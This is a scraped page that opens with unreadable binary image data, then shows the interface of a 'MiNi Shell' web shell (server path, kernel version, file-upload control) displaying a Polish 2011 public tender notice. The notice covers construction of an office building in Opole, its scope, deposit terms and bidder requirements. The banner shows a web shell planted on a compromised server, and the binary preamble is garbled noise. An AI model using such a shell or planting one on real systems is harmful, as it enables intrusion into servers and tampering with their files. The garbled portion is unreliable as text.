JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/445576-N-2011.html

<p class="kh_header"><b>Opole: Budowa budynku biurowo-administracyjnego przy ul. Cmentarnej w Opolu-Półwsi</b><br>
<b>Numer ogłoszenia: 445576 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny , ul. Podmiejska 69, 45-574 Opole, woj. opolskie, tel. 0-77 4562569 w. 25, faks 0-77 4563258.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakład-komunalny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o. o. ze 100% udziałem JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku biurowo-administracyjnego przy ul. Cmentarnej w Opolu-Półwsi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty budowlane polegające na budowie budynku biurowo-administracyjnego przy ul. Cmentarnej  w Opolu Półwsi.   
Opis przedmiotu zamówienia.
1.Przedmiotem   zamówienia    jest    kompleksowe    wybudowanie   nowego   budynku   biurowo 	administracyjnego wraz z przyłączami.
2.Zamówienie  podzielono na następujące  etapy /nie oznacza  to  podzielenia  zamówienia  na części umożliwiających złożenie osobnych ofert/:
Etap I	 Roboty przygotowawcze
Etap II 	 Roboty budowlano-montażowe oraz roboty instalacyjne i  wykończeniowe.
3.Zakres przedmiotu zamówienia obejmuje:
a)wykonanie,  na  podstawie  opracowanej  dokumentacji  projektowej  oraz  wydanych  aktów 	administracyjnych, kompletnego obiektu budowlanego spełniającego wymagania opisane w dokumentacji projektowej, SIWZ oraz pozostałych załącznikach - zarówno do SIWZ jak i do dokumentacji projektowej.
4.Obiekt będzie budynkiem niskim, parterowym o wysokości ok. 5,00 m /od poziomu terenu   do najwyższego punktu  dachu nad salą/ niepodpiwniczonym, zlokalizowanym na wolnej od zabudowy powierzchni działki nr 28, będącej  własnością  gminy  Opole. Będzie to obiekt wolnostojący. 
UWAGA
W zakresie robót budowlanych ze strony zamawiającego wykonane zostaną:
a	parkingi wraz z drogą dojazdową do parkingów;
b	brama wjazdowa oraz furtka;
c	ścieżka do obiektu;
d	opaska wokół budynku.
	
5.Charakterystyczne parametry określające wielkość obiektu oraz właściwości funkcjonalno-użytkowe.
Poniżej zestawiono parametry charakteryzujące obiekt (wskaźniki powierzchniowo - kubaturowe):
- POWIERZCHNIA UŻYTKOWA     Pu  =   92,47 m2,
- POWIERZCHNIA ZABUDOWY     Pz =    115,40 m2,
- KUBATURA                            V    =   395,50 m3.

6.Dodatkowe obowiązki Wykonawcy
Do obowiązków wykonawcy należeć będzie również:
a.Ustalenie  geotechnicznych  warunków posadowienia obiektu, zgodnie z projektem budowlanym, wykonawczym i obowiązującymi w tym zakresie przepisami.
b.Uzyskanie wszelkich, wymaganych przepisami prawa, uzgodnień i opinii.
	
7.Zakres rzeczowy przedmiotu zamówienia
7.1.Wykonanie przedmiotowego obiektu będzie wiązało się m.in. z:
a.)Wytyczeniem geodezyjnym osi przyszłego obiektu w terenie.
b.)Usunięciem i spryzmowaniem humusu z powierzchni przeznaczonej pod zabudowę.
c.)Makroniwelacją istniejącego terenu.
d.)Wykonaniem tymczasowego zasilania placu budowy.
e.)Zorganizowaniem zaplecza budowy.
f.)Wykonaniem dróg tymczasowych i placów manewrowo - składowych.

7.2W ramach przedmiotu zamówienia należy wykonać również:
a.)wymagane  projekty  i  rysunki  wykonawcze  lub  warsztatowe uzgodnione z Nadzorem Autorskim oraz Zamawiającym;
b.)wyposażenie  obiektu  w  podstawowy  sprzęt  p.poż. wraz z jego oznakowaniem i oznakowaniem dróg ewakuacyjnych;
c.)świadectwo charakterystyki energetycznej budynku, zgodnie z wymogami prawa budowlanego;
d.)instrukcję p.poż. budynku;
e.)usunięcie napotkanych kolizji;
f.)dokonanie uzgodnień, odbiorów, wyłączeń sieci w celu wykonania robót;
g.)wykonanie dokumentacji powykonawczej;
h.)obsługę geodezyjną;
i.)przygotowanie dokumentacji formalno-prawnej wynikającej z Prawa budowlanego (art. 57).
	
7.3.Zakres robót budowlanych:
7.3.1.Wynika   z:  
a.)SIWZ;
b.)dokumentacji projektowej;
c.)załączników do SIWZ 
7.3.2.Obejmuje pozostałe roboty i prace niezbędne do prawidłowego i należytego wykonania przedmiotu zamówienia.
7.4. Zakres robót związanych z zagospodarowaniem terenu to m.in.:
a.)wykonanie podjazdu dla osób niepełnosprawnych oraz schodów w lekkiej konstrukcji stalowej z podestami oraz stopnicami wykonanymi z elementów stalowych - ażurowych;

7.5.Szczegółowy opis przedmiotu zamówienia określają:	
 7.5.1.Dokumentacja projektowa - stanowiąca załącznik do SIWZ.
7.5.2.Specyfikacje techniczne wykonania i odbioru robót - stanowiące załącznik do SIWZ.
7.5.3.Szczegółowe specyfikacje techniczne - stanowiące załączniki do SIWZ.
7.5.4.Przedmiary robót - stanowiące załączniki do SIWZ.

7.5.6.Informacje  dotyczące  przedmiotu  zamówienia  zawarte  w którymkolwiek dokumencie uważa się za obowiązujące. Wymienione dokumenty należy traktować jako wzajemnie wyjaśniające się. W przypadku 	powstania nie dających się pogodzić niezgodności o charakterze technicznym - podstawą do ostatecznego ustalenia przedmiotu zamówienia oraz wyceny tego przedmiotu - jest zawsze projekt budowlany, a w dalszej kolejności projekt wykonawczy. Przedmiary robót należy traktować pomocniczo.
Ryzyko prawidłowości ustalenia kosztów wykonania przedmiotu zamówienia ponosi wykonawca.

7.6.Uwarunkowania wykonania przedmiotu zamówienia.
1.Inwestycja realizowana będzie na użytku gruntowym na działce Nr 28 (k.m. 29 obręb Półwieś).
  2.Zamawiający posiada: 
a.)oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane;
b.)mapy do celów projektowych;
c.)warunki techniczne na wykonanie przyłącza wodociągowego i  kanalizacyjnego ;
d.)warunki przyłączenia do sieci elektrycznej;
e.)zgłoszenie budowy przyłącza;
f.)decyzję zatwierdzającą projekt budowlany;
g.)projekt tymczasowej  organizacji ruchu  drogowego na czas budowy, uzgodniony z Miejskim Zarządem Dróg w Opolu, dla zrealizowania wszystkich branż objętych dokumentacją projektową;

7.7.	Warunki realizacji przedmiotu zamówienia.
7.7.1.	Roboty budowlane
1.Zamawiający  przekaże  wykonawcy  do  realizacji  plac  budowy  obejmujący  teren   określony 	dokumentacją projektową.
2.Przed przystąpieniem do robót wykonawca winien własnym staraniem i na własny koszt przygotować teren budowy .
3.Zagospodarowanie placu budowy może zmieniać się w poszczególnych fazach realizacji budowy i w takim przypadku powinno przygotować się plany zagospodarowania placu dla każdej z tych faz.
4.Wykonawca zobowiązuje się do organizacji  robót w sposób zapewniający terminową realizację przedmiotu zamówienia.
5.W przypadku robót z udziałem podwykonawców obowiązują przepisy art. 6471 kc. Zgodnie  z powyższym do  zawarcia  umowy  przez  wykonawcę z podwykonawcą wymagana jest zgoda zamawiającego. Niezgłoszenie na piśmie przez zamawiającego sprzeciwu lub zastrzeżeń do umowy lub jej projektu w terminie 14 dni od jej przedstawienia, traktowane będzie jako wyrażenie zgody przez zamawiającego na zawarcie umowy wykonawcy z podwykonawcą. Umowa łącząca wykonawcę   z podwykonawcą winna być zawarta w formie pisemnej pod rygorem nieważności.
6.Wykonawca  zobowiązany  jest   prowadzić   roboty   w   sposób   nie  powodujący  uszkodzenia infrastruktury nadziemnej,  podziemnej  mienia  osób  trzecich. Wykonawca zobowiązuje się  do naprawienia szkody wynikłej z tytułu wyrządzenia powyższych szkód.
7.Wykonawca winien przestrzegać warunków prowadzenia robót zawartych w:
a.)  decyzjach, uzgodnieniach i opiniach do dokumentacji projektowej;
b.) specyfikacjach technicznych wykonania robót oraz szczegółowych specyfikacjach technicznych zawartych w opisie technicznym do dokumentacji projektowej;
c.)  uzgodnieniach z użytkownikiem terenu;
d.)założeniach do technologii wykonania robót zawartych w opisach technicznych do dokumentacji projektowej.
8.W celu wyeliminowania późniejszych roszczeń ze strony właścicieli nieruchomości sąsiadujących   z  terenem  budowy  i  układem  drogowym stanowiącym dojazd do budowy, Wykonawca przed 	rozpoczęciem robót przy współudziale zainteresowanych stron oraz Zamawiającego zobowiązany jest do:
a.)sporządzenia dokumentacji fotograficznej terenu i obiektów;
b.)założenia i obserwacji plomb kontrolnych, raperów geodezyjnych.
Wykonawca ponosi odpowiedzialność w przypadku wystąpienia uszkodzeń obiektów wynikających   z niewłaściwego prowadzenia robót. W celu przeciwdziałania powyższym skutkom należy przyjąć 	bezwstrząsową technologię wykonania robót.
Koszty za ww. elementy Wykonawca winien uwzględnić w wynagrodzeniu ryczałtowym.

8. Wykonawca zobowiązany jest:
1.Przed rozpoczęciem robót do przedłożenia harmonogramu robót  Zamawiającemu.
2.Uzyskać zgodę Miejskiego Zarządu Dróg na czasowe zajęcie pasów drogowych. Koszty zajęcia pasa drogowego  i  wbudowania   urządzeń   w   pas  drogowy  należy  uwzględnić  w wynagrodzeniu 	ryczałtowym. Wykonawca  zobowiązany  jest  do  jednorazowego  uregulowania  należności  za wbudowanie urządzeń w pas drogowy za cały okres określony zezwoleniem Miejskiego Zarządu Dróg w Opolu.
3.Zapewnić    bezpieczne   przejścia   piesze   oraz   dojazd:   służbom   komunalnym,   pojazdom 		uprzywilejowanym.
4.Zapewnić  bezpieczną  organizację  ruchu  kołowego  i  pieszego wraz z czytelnym i widocznym 		oznakowaniem.
5.Zapewnić bezpieczeństwo osób przebywających na terenie budowy oraz ochronę mienia.
6.Prowadzić roboty zgodnie z przepisami bhp i p.poż. oraz utrzymywać plac budowy w należytym porządku, a  po  zakończeniu  robót  uporządkować,  odtwarzając  zniszczone  na  skutek  prac budowlanych elementy otoczenia.
7.Przyjąć technologię i organizację robót, która nie spowoduje dewastacji wykonanych robót.
8.Zorganizować we własnym zakresie czasowy plac składowy urobku powstałego podczas wykonywania robót.
9.Przekazać dokumentację odbiorową w dwóch egzemplarzach.
10.Przekazać na dzień odbioru końcowego instrukcję bezpiecznej eksploatacji obiektu.
11.Przekazać na dzień odbioru końcowego instrukcję obsługi systemów instalacyjnych.
12.Przeszkolić  wskazanych  pracowników  Zamawiającego  w   zakresie   obsługi   ww.  systemów instalacyjnych.
13.Zapewnić  współpracę  z  Zamawiającym  na  terenie  budowy  wykonującym roboty nie będące 	przedmiotem umowy.
14.Zapewnić Zamawiającemu, wszystkim osobom upoważnionym przez niego, jak też innym uczestnikom procesu budowlanego  dostęp  do  terenu  budowy  i  do  każdego miejsca gdzie roboty w związku     z umową będą wykonywane.
15.Zanieczyszczoną ziemię, odpady budowlane, gruz i śmieci należy wywieźć na legalne wysypisko. Koszt wywozu wraz z jego utylizacją należy uwzględnić w wynagrodzeniu ryczałtowym. Wykonawca dostarczy Zamawiającemu dokumenty potwierdzające dokonanie ww. wywozu na legalne składowisko.
16.Odległość dowozu mas ziemnych na wymianę gruntu, posypki ustali we własnym zakresie Wykonawca  i uwzględni koszty z tym związane w wynagrodzeniu ryczałtowym.

9.Wykonawca we własnym zakresie:
1.Zorganizuje czasowe zaplecze budowy na terenie przeznaczonym pod realizację zadania.
2.Zamontuje na własny koszt tymczasowe urządzenia pomiarowe na dostawę wody i energii elektrycznej dla potrzeb placu budowy wraz z uzyskaniem warunków technicznych od gestorów sieci.
3.Kompleksową  obsługę  geodezyjną niezbędną przy realizacji zamówienia wraz z operatem geodezyjnym powykonawczym zabezpiecza Wykonawca, a jej koszt należy uwzględnić w cenie oferty.

10. Kompleksowa obsługa geodezyjna m.in. obejmuje:
1.Wznowienie punktów granicznych na dzień przekazania placu budowy.
2.Wyznaczenie punktów sytuacyjnych i wysokościowych.
3.Wykonanie pomiarów bieżących.
4.Prowadzenie dokumentacji geodezyjnej.
5.Inwentaryzację powykonawczą.
6.Odtworzenie punktów granicznych w przypadku zniszczenia.

11.Wykonawca przekaże Zamawiającemu:
1.Dokumentację powykonawczą w układzie branżowym wraz z odbiorami branżowymi, próbami i sprawdzeniami z wynikiem pozytywnym - w dwóch kpl.
2.Geodezyjną   inwentaryzację   powykonawczą   zarejestrowaną    w    Ośrodku   Dokumentacji   Geodezyjno-Kartograficznej  w  dwóch egz. oraz 2 kpl. inwentaryzacji powykonawczej zbiorczej, niezbędną do wystąpienia  z wnioskiem o pozwolenie na użytkowanie.
3.Wykonawca zapewni dla zrealizowania robót udział kierowników branżowych robót z uprawnieniami  i kwalifikacjami zawodowymi uprawniającymi do wykonania samodzielnych funkcji technicznych  w budownictwie.

3.5.3.	Materiały i wyroby użyte do wykonania przedmiotu zamówienia winny spełniać wymogi określone  w obowiązujących przepisach prawa dotyczących wykonania przedmiotu zamówienia.
3.5.4.	Wykonawca zobowiązany jest do dostarczenia dokumentów potwierdzających, że wszelkie materiały,systemy, produkty, rozwiązania posiadają wymagane prawem aktualne świadectwa, deklaracje, certyfikaty, aprobaty wydane przez uprawnione instytucje (np.: ITB) i są dopuszczone do stosowania w Polsce. Wszelkie aprobaty europejskie musza być tłumaczone na język polski i akceptowane przez krajową jednostkę notyfikowaną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.10-9, 45.32.00.00-6, 45.43.20.00-4, 45.41.00.00-4, 45.32.10.00-3, 45.42.10.00-4, 45.42.11.41-4, 45.42.11.46-9, 45.44.20.00-7, 45.34.20.00-6, 45.23.32.20-7, 45.11.12.00-0, 45.33.22.00-5, 45.23.13.00-8, 45.31.53.00-1, 45.30.00.00-0, 45.32.40.00-4, 45.33.12.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający  wymaga  wniesienia  wadium  w  wysokości:  10.000,00 zł 
	(słownie: dziesięć tysięcy złotych 00 100).
2.	Wadium należy wnieść przed terminem składania ofert.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
	a.)	pieniądzu;
	b.)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym  że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	c.) 	gwarancjach bankowych;
	d.) 	gwarancjach ubezpieczeniowych;
	e.) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia   9 listopada 2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2007 r.  Nr 42, poz. 275 z późniejszymi zmianami).
4.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek w Pekao S.A    -nr rachunku : 52 1240 4272 1111 0000 4837 1151
5.	Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie zamawiającego (sekretariat - I piętro) w oddzielnej kopercie z napisem:
Wadium na przetarg - Budowa budynku biurowo-administracyjnego
przy ul. Cmentarnej w Opolu-Półwsi
Kserokopię(-e) potwierdzoną( e) za zgodność z oryginałem przez osobę(-y) uprawnioną(-e) do składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty. Dopuszczalne jest również dołączenie  do oferty oryginału wadium.
6.	Wadium wniesione przez jednego z członków konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz  co  najmniej  dwóch  robót budowlanych (załącznik nr 6),  w zakresie odpowiadających 	przedmiotowi  zamówienia,  o wartości nie mniejszej niż 500.000,00 zł (brutto) za każdą robotę, wykonanych w okresie ostatnich pięciu  lat  przed  upływem  terminu  składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia 	działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje).
Zamawiający wymaga aby wykazane roboty budowlane dotyczyły budowy obiektów będącymi budynkami użyteczności publicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, ze wykonawca dysponuje odpowiednimi osobami do wykonania zamówienia, do oferty należy dołączyć:
1.Wykaz   osób,  które  będą   uczestniczyć w  wykonaniu zamówienia (załącznik nr 5), które to osoby:
a.)posiadają uprawnienia budowlane w specjalności konstrukcyjno-budowlanej - osoba pełniąca funkcję kierownika budowy z minimum 5-letnim doświadczeniem w pełnieniu funkcji kierownika 	budowy lub kierownika robót, posiadająca aktualną przynależność do Izby Inżynierów Budownictwa.
b.)są zatrudnione na zasadach umowy o pracę na pełny etat na stanowiskach roboczych - nie mniej niż 25 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Informację  z  banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada  rachunek,  potwierdzającej  wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy nie mniejszą niż 1.000.000,00 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.Opłaconą  polisę,  a  w  przypadku  jej braku inny dokument potwierdzający, że wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia na kwotę nie mniejszą niż 1.000.000,00 zł.
Ważność polisy musi obowiązywać w trakcie wykonywania przedmiotu zamówienia i ważności umowy.
W przypadku upływu terminu ważności obowiązywania polisy w trakcie wykonywania przedmiotu zamówienia Wykonawca zobowiązany jest do opłacenia nowej polisy na kwotę nie mniejszą jak określona w pkt 6.5. ppkt 2 i przedłożenia jej Zamawiającemu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

